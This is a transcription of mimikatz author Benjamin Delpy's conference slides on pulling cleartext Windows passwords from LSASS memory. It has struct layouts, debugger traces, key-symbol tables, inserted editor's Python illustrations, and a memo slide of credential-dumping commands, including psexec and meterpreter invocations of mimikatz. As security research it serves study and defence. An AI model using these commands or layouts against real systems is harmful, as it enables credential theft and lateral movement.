mimikatz - Blog de Gentil Kiwi

Uploaded 21 Nov 2013

mimikatz

Benjamin DELPY `gentilkiwi`

Focus on sekurlsa / pass-the-pass and crypto patches

Who? Why?

Benjamin DELPY `gentilkiwi`
- French
- 26y
- Kiwi addict
- Lazy programmer

Started to code mimikatz to:
- explain security concepts;
- improve my knowledge;
- prove to Microsoft that sometimes they must change old habits.

Why all in French?
- because I'm
- It limits script kiddies' usage
- Hack with class

07/11/2012 - Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com - slide 2

mimikatz - where it works

- On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
- x86 & x64
- 2000 support dropped with mimikatz 1.0
- Everywhere; it's statically compiled

Two modes
- direct action (local commands)
- process or driver communication

mimikatz - architecture of sekurlsa & crypto

[Diagram: mimikatz.exe acts on three service hosts]
- KeyIso service ("CNG Key Isolation"), hosted in LSASS.EXE: direct action, crypto::patchcng
- EventLog service ("Windows Event Log"), hosted in SVCHOST.EXE: direct action, divers::eventdrop
- SamSS service ("Security Accounts Manager"), hosted in LSASS.EXE: sekurlsa.dll is injected with VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...; the injected DLL then opens a pipe, writes a welcome message, waits for commands and returns results

[Diagram: modules inside mimikatz.exe and the injectable components]

mimikatz.exe command modules: mod_mimikatz_sekurlsa, mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege

Shared helper modules: mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi, mod_cryptoacng

Security-package parsers (msv_1_0, tspkg, wdigest, livessp, kerberos) appear twice in the diagram: once in mimikatz.exe and once in sekurlsa.dll; sam and secrets sit beside them for samdump

Injectable DLLs / driver: kappfree.dll, kelloworld.dll, klock.dll, mimikatz.sys, sekurlsa.dll

mimikatz :: sekurlsa - what is it?

- A module replacement for my previous favorite library!
- A local module that can read data from the SamSS service (the well-known LSASS process)
- What the sekurlsa module can dump:
  - MSV1_0 hashes
  - TsPkg passwords
  - Wdigest passwords
  - LiveSSP passwords
  - Kerberos passwords (!)
  - ...?

(module: mod_mimikatz_sekurlsa)

mimikatz :: sekurlsa - how LSA works (Playskool level)

[Diagram: WinLogon hands user:domain:password to LsaSS; LsaSS hosts the authentication packages msv1_0, tspkg, wdigest, livessp and kerberos; the authentication itself is done by msv1_0 (against the SAM, by challenge/response) or by kerberos]

mimikatz :: sekurlsa - how LSA works (Playskool level)

Authentication packages:
- take the user's credentials from the logon
- do their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)

If we can get that data, and inject it into another LSASS session, we skip the authentication part
- This is the principle of "Pass-the-hash"
- In fact, of "Pass-the-x"

mimikatz :: sekurlsa - history of "pass-the-*" 1/2

Pass-the-hash
- 1997 - Unix modified SAMBA client for hash usage; Paul Ashton (EIGEN)
- 2000 - Private version of a Windows "LSA Logon Session Editor"; Hernan Ochoa (CoreSecurity)
- 2007 - TechEd @ Microsoft; Marc Murray (TrueSec) presents msvctl, and provides some downloads of it
- 2007 - "Pass the hash toolkit" published; Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;))
- 2007 was the year of pass the hash!

Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity)

mimikatz :: sekurlsa - history of "pass-the-*" 2/2

Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz; it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases with Microsoft about it...
- ...Lots of time...
- beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction...
  http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again..., more curious, but Kerberos keeps passwords in memory
  http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without injection at all! (ultra safe)
  http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition

mimikatz :: sekurlsa :: tspkg

because sometimes the hash is not enough

mimikatz :: sekurlsa :: tspkg - what is it?

Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApps and Remote Desktop user experience
- http://technet.microsoft.com/library/cc772108.aspx
- Relies on CredSSP with Credentials Delegation (!= account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression: it seems cool
- The user does not have to type their password
- The password is not in the RDP file
- The password is not in user secrets

mimikatz :: sekurlsa :: tspkg - questions?

The KB says that for it to work, we must enable "Default credentials" delegation
- Default credentials: "The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
- What? Our User/Domain/{Password | Hash | Ticket}? It seems...
- In all cases, the system seems to be vulnerable to pass-the-*...

In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
- The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)

  TSPasswordCreds ::= SEQUENCE {
      domainName  [0] OCTET STRING,
      userName    [1] OCTET STRING,
      password    [2] OCTET STRING
  }

Challenge / response for authentication?
- Server: YES (TLS / Kerberos)
- Client: NO; the *password* is sent to the server...

So the password resides somewhere in memory?
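To make the [MS-CSSP] structure above concrete, here is an added example (editor's code, not from the slides and not mimikatz's own) that builds and parses a TSPasswordCreds blob in DER. It assumes, from the CredSSP spec rather than from the slide, that the OCTET STRINGs carry UTF-16LE text and that the [0]/[1]/[2] tags are explicit. In the real protocol this blob is wrapped in a TSCredentials structure and encrypted by the negotiated Kerberos/NTLM security context inside the TLS tunnel, but the client can only produce it if it still holds the password, which is exactly the slide's point.

```python
"""Build and parse a [MS-CSSP] TSPasswordCreds blob (constructed example)."""

# Assumption (from the CredSSP spec, not stated on the slide): the OCTET STRING
# contents are UTF-16LE Unicode strings, and the [0]/[1]/[2] tags are explicit.


def _der_length(n: int) -> bytes:
    """DER length octets: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] }"""
    fields = []
    for index, value in enumerate((domain, user, password)):
        octets = _tlv(0x04, value.encode("utf-16-le"))   # OCTET STRING
        fields.append(_tlv(0xA0 | index, octets))         # explicit [index] tag
    return _tlv(0x30, b"".join(fields))                   # SEQUENCE


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, body, position after this element)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                                     # long form length
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(blob: bytes) -> dict:
    """Parse the blob back into its three strings; raises ValueError on malformed input."""
    tag, seq, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("not a single SEQUENCE")
    names = {0: "domainName", 1: "userName", 2: "password"}
    out, pos = {}, 0
    while pos < len(seq):
        ctx_tag, ctx_body, pos = _read_tlv(seq, pos)
        if ctx_tag & 0xE0 != 0xA0:
            raise ValueError("expected a context-specific constructed tag")
        inner_tag, octets, _ = _read_tlv(ctx_body, 0)
        if inner_tag != 0x04:
            raise ValueError("expected OCTET STRING")
        out[names[ctx_tag & 0x1F]] = octets.decode("utf-16-le")
    return out


def password_is_in_clear(blob: bytes, password: str) -> bool:
    """The slide's point: the delegated password sits in the blob verbatim (unhashed),
    so the client must still hold it, and it therefore exists in LSASS memory."""
    return password.encode("utf-16-le") in blob
```

The constructed values used below (domain vm-w8-rp-x, user Gentil Kiwi, password waza1234/) are the ones from the demo slide later in the deck.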

mimikatz :: sekurlsa :: tspkg - symbols & theory

Let's explore some symbols!

  kd> x tspkg!*clear*
  75016d1c tspkg!TSObtainClearCreds = <no type information>
  kd> x tspkg!*password*
  75011b68 tspkg!TSDuplicatePassword = <no type information>
  75011cd4 tspkg!TSHidePassword = <no type information>
  750195ee tspkg!TSRevealPassword = <no type information>
  75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
  kd> x tspkg!*locate*
  7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

sounds cool... (thanks Microsoft)

Let's imagine a scenario:
- Enumerate all sessions to obtain: Username, Domain, LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain a TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) to get a TS_PRIMARY_CREDENTIAL with clear text credentials

mimikatz :: sekurlsa :: tspkg - workflow

[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable -> KIWI_TS_CREDENTIAL -> pTsPrimary -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear!]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg - demo time!

sekurlsa::tspkg

mimikatz :: sekurlsa :: wdigest

because a clear text password over http/https is not cool

mimikatz :: sekurlsa :: wdigest - what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]"
Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP"
Microsoft: http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory; hashes for each realm
  - Only with Advanced Digest authentication

mimikatz :: sekurlsa :: wdigest - what is it?

We speak about hashes, but which hashes?

  H   = MD5(HA1:nonce:[...]:HA2)
  HA1 = MD5(username:realm:password)
  HA2 = MD5(method:digestURI:[...])

Even after login, HA1 may change... the realm comes from the server side and cannot be determined before Windows logon

So the WDigest provider must hold the elements needed to compute responses for different servers:
- Username
- Realm (from the server)
- Password
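The three hash lines above are the whole reason the provider keeps the password: HA1 is bound to a realm that the server picks at challenge time. This added example (editor's code, not from the slides and not mimikatz's own) works through RFC 2617 digest with qop=auth on both sides so the asymmetry is visible: the server stores one HA1 per realm and never needs the password, while a client that cached only HA1 values could answer nothing but the realms it has already seen. The test vector is the one from RFC 2617 section 3.5; the extra realm name is constructed.

```python
"""Digest (RFC 2617) on both sides: why the client-side provider needs the password itself.
Added example; not mimikatz code and not from the slides."""
import hashlib
import hmac


def _md5(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server."""
    return _md5(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return _md5(f"{method}:{digest_uri}")


def response_from_ha1(h1: str, nonce: str, nc: str, cnonce: str, qop: str, h2: str) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    return _md5(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


def client_response(username, password, realm, method, uri, nonce, nc, cnonce, qop="auth"):
    """Client side: the realm only arrives in the challenge, so HA1 is derived from the password now."""
    return response_from_ha1(ha1(username, realm, password), nonce, nc, cnonce, qop, ha2(method, uri))


def server_verify(stored_ha1, method, uri, nonce, nc, cnonce, response, qop="auth") -> bool:
    """Server side: a stored HA1 for its own realm is enough; no password needed there."""
    expected = response_from_ha1(stored_ha1, nonce, nc, cnonce, qop, ha2(method, uri))
    return hmac.compare_digest(expected, response)


def ha1_per_realm(username: str, password: str, realms) -> dict:
    """One distinct HA1 per realm: nothing realm-independent can be precomputed at logon."""
    return {realm: ha1(username, realm, password) for realm in realms}


def can_answer_with_cache(ha1_cache: dict, challenged_realm: str) -> bool:
    """A password-less client holding only cached HA1 values answers only realms it has seen."""
    return challenged_realm in ha1_cache
```

Nothing here is specific to WDigest's memory layout; it only shows why a Windows SSP that must answer arbitrary servers after a single logon ends up storing the password (protected with LsaProtectMemory, as the next slides show) rather than a realm-bound hash.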

mimikatz :: sekurlsa :: wdigest - theory

This time, we know:
- that WDigest keeps the password in memory "by protocol" for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)

LsaUnprotectMemory
- at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest:
    .text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]
- Hypothesis seems verified

LsaProtectMemory
- at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest:
    .text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
- SpAcceptCredentials takes the clear password in its args
- protects it with LsaProtectMemory
- updates or inserts the data in a doubly linked list: wdigest!l_LogSessList

mimikatz :: sekurlsa :: wdigest - workflow

[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the wdigest!l_LogSessList linked list for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear!]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    [...]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
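The workflow above (and the identical LIST_ENTRY walks for livessp!LiveGlobalLogonSessionList and the NT5 kerberos!KerbLogonSessionList later in the deck) is simple enough to run against a flat memory image. This added example is the editor's, not mimikatz code: it lays out a circular 32-bit list of entries shaped like KIWI_WDIGEST_LIST_ENTRY in a constructed image, then walks Flink from the list head, matches a LUID and reads the three LSA_UNICODE_STRINGs. Two assumptions are labelled in the code: the three strings are placed directly after the LUID (CRED_OFFSET), because the real [...] gap is not given on the slide, and the Password buffer holds plaintext, whereas in LSASS it holds the LsaProtectMemory output and must first go through LsaUnprotectMemory (or the key-import trick shown later). The session values are the ones from the demo slide and are constructed data.

```python
"""Walk a LIST_ENTRY-linked credential list in a flat 32-bit memory image (constructed example)."""
import struct

BASE = 0x74000000        # constructed load address of the fake lsass image
# Assumption: in this constructed layout the three LSA_UNICODE_STRINGs start right after the
# LUID (offset 0x18); the real entry has an undisclosed [...] gap there, so do not reuse it.
CRED_OFFSET = 0x18
ENTRY_SIZE = CRED_OFFSET + 3 * 8


class Image:
    """Flat little-endian 32-bit memory with a bump allocator (stands in for ReadProcessMemory)."""

    def __init__(self, base: int):
        self.base, self.buf = base, bytearray()

    def alloc(self, data: bytes) -> int:
        addr = self.base + len(self.buf)
        self.buf += data
        self.buf += b"\0" * (-len(self.buf) % 8)       # keep 8-byte alignment
        return addr

    def read(self, addr: int, size: int) -> bytes:
        off = addr - self.base
        return bytes(self.buf[off:off + size])

    def write(self, addr: int, data: bytes) -> None:
        off = addr - self.base
        self.buf[off:off + len(data)] = data

    def u32(self, addr: int) -> int:
        return struct.unpack("<I", self.read(addr, 4))[0]


def build_log_sess_list(img: Image, sessions: list) -> int:
    """Lay out a circular list shaped like wdigest!l_LogSessList; returns the list head address."""
    head = img.alloc(b"\0" * 8)                           # LIST_ENTRY head (Flink, Blink)
    keys = ("user", "domain", "password")
    strings = [[img.alloc(s[k].encode("utf-16-le")) for k in keys] for s in sessions]
    first = img.base + len(img.buf)                       # entries are laid out contiguously
    entries = [first + i * ENTRY_SIZE for i in range(len(sessions))]
    for i, session in enumerate(sessions):
        flink = entries[i + 1] if i + 1 < len(entries) else head
        blink = entries[i - 1] if i > 0 else head
        entry = struct.pack("<IIII", flink, blink, 1, entries[i])   # Flink, Blink, UsageCount, This
        entry += struct.pack("<Q", session["luid"])                 # LUID {LowPart, HighPart}
        for k, buf in zip(keys, strings[i]):
            n = len(session[k].encode("utf-16-le"))
            entry += struct.pack("<HHI", n, n + 2, buf)             # LSA_UNICODE_STRING
        assert img.alloc(entry) == entries[i]
    img.write(head, struct.pack("<II", entries[0], entries[-1]))
    return head


def read_lsa_string(img: Image, addr: int) -> str:
    length, _maximum, buf = struct.unpack("<HHI", img.read(addr, 8))
    return img.read(buf, length).decode("utf-16-le")


def enumerate_luids(img: Image, head: int) -> list:
    """Follow Flink until the list wraps back to its head (a LsaEnumerateLogonSessions stand-in)."""
    luids, cur, seen = [], img.u32(head), set()
    while cur != head:
        if cur in seen:                                   # corrupt list: never returns to head
            raise RuntimeError("cycle in list that does not pass through the head")
        seen.add(cur)
        luids.append(struct.unpack("<Q", img.read(cur + 0x10, 8))[0])
        cur = img.u32(cur)
    return luids


def find_by_luid(img: Image, head: int, luid: int):
    """What sekurlsa does per logon session: locate the entry for the LUID and pull its strings."""
    cur = img.u32(head)
    while cur != head:
        if struct.unpack("<Q", img.read(cur + 0x10, 8))[0] == luid:
            base = cur + CRED_OFFSET
            return {name: read_lsa_string(img, base + 8 * i)
                    for i, name in enumerate(("UserName", "Domaine", "Password"))}
        cur = img.u32(cur)
    return None


SESSIONS = [   # constructed data; values borrowed from the demo slide
    {"luid": 234870, "user": "Gentil Kiwi", "domain": "vm-w8-rp-x", "password": "waza1234/"},
    {"luid": 999, "user": "SYSTEM", "domain": "NT AUTHORITY", "password": ""},
]
IMAGE = Image(BASE)
L_LOG_SESS_LIST = build_log_sess_list(IMAGE, SESSIONS)
```

On a real target the same walk is done over ReadProcessMemory (or a dump), with 8-byte pointers on x64 and the provider's true field offsets resolved from symbols, and the Password buffer is then handed to the unprotect routine.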

mimikatz :: sekurlsa :: wdigest - demo time!

sekurlsa::wdigest

mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks

mimikatz :: sekurlsa :: livessp - how

Actually I've only used a logical (empirical) approach to search for passwords...:
- Protocol reading
- Symbols searching
- ~ Boring ~
... let's be more brutal this time: set a WinDBG trap!

  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
      DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
      Image: lsass.exe

  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context
  to be switched. When the debugger breaks in again, you will be in
  the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc              int     3
  0: kd> .reload /user
  Loading User Symbols
  ............................................................
  0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
  0: kd> g

mimikatz :: sekurlsa :: livessp - how

Let's log in with a Live account on Windows 8!

Call stacks caught by the trap (kc 5 at each hit of lsasrv!LsaProtectMemory):

  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2
  livessp!SpiLogonUserEx2

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert the data in LiveGlobalLogonSessionList (similar to WDigest)

  1: kd> uf /c livessp!LsaApLogonUserEx2
  livessp!LsaApLogonUserEx2 (74781536)
  [...]
    livessp!LsaApLogonUserEx2+0x560 (74781a96):
      call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider: yeah, pass-the-hash capability with Live accounts too... a Live user can log on through RDP via SSO

mimikatz :: sekurlsa :: livessp - workflow

[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the livessp!LiveGlobalLogonSessionList linked list for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear!]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

mimikatz :: sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?*

* Me, yes

mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account

Call stacks caught by the trap:

  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

Kerberos part for the password??????
Kerberos, ticket part? Maybe ;)

After credential protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession to insert the data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert the data in KerbLogonSessionList

mimikatz :: sekurlsa :: kerberos (nt6) - workflow

[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear!]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

mimikatz :: sekurlsa :: kerberos (nt5) - workflow

[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the kerberos!KerbLogonSessionList linked list for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear!]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

mimikatz :: sekurlsa - demo time!

Final sekurlsa demo: sekurlsa::logonPasswords full

mimikatz :: sekurlsa :: kerberos - "hu?"

OK, it works...*  But why?

* Not for every logon on NT5 (can require an unlock)

From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol...
- everything is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic...
- For password auth: the password hash is the shared secret, but the password is kept in memory
- For full smartcard auth:
  - No password on the client
  - No hash on the client? NTLM hash on the client...
  - the KDC sent it back as a gift

mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used
- We used LsaUnprotectMemory, in the LSASS context, to decrypt them
  - This function relies on LsaEncryptMemory from lsasrv.dll
- For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to benefit from its keys when we called it

Can it be fun to decrypt outside the process?
- Yes, it is... no more injection, just reading the memory of the LSASS process...
- mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
  - When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we get the same behaviour as when we are in LSASS!

mimikatz :: sekurlsa - LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESX

[Diagram: the key material living in lsass (lsasrv) is copied into the lsasrv loaded by mimikatz]
  g_pRandomKey  -> BYTE[g_cbRandomKey]
  g_cbRandomKey -> DWORD ; 256
  g_pDESXKey    -> BYTE[144]
  g_Feedback    -> BYTE[8]

mimikatz :: sekurlsa - LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES

[Diagram: the key material living in lsass (lsasrv) is copied into the lsasrv loaded by mimikatz]
  InitializationVector -> BYTE[16]
  h3DesKey -> KIWI_BCRYPT_KEY -> KIWI_BCRYPT_KEY_DATA
  hAesKey  -> KIWI_BCRYPT_KEY -> KIWI_BCRYPT_KEY_DATA

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc... */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

mimikatz :: sekurlsa - memo

Security Packages

  Package         Symbols                               Type
  tspkg           tspkg!TSGlobalCredTable               RTL_AVL_TABLE
  wdigest         wdigest!l_LogSessList                 LIST_ENTRY
  livessp         livessp!LiveGlobalLogonSessionList    LIST_ENTRY
  kerberos (nt5)  kerberos!KerbLogonSessionList         LIST_ENTRY
  kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable  RTL_AVL_TABLE
  msv1_0          lsasrv!LogonSessionList               LIST_ENTRY
                  lsasrv!LogonSessionListCount          ULONG

Protection Keys

  Key NT5   Symbols
  RC4       lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESX      lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key NT6   Symbols
            lsasrv!InitializationVector
  3DES      lsasrv!h3DesKey
  AES       lsasrv!hAesKey

mimikatz :: sekurlsa - memo

Some commands:
  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Sample output (the French labels of this build are translated here):

  mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Request to ENABLE privilege: SeDebugPrivilege : OK

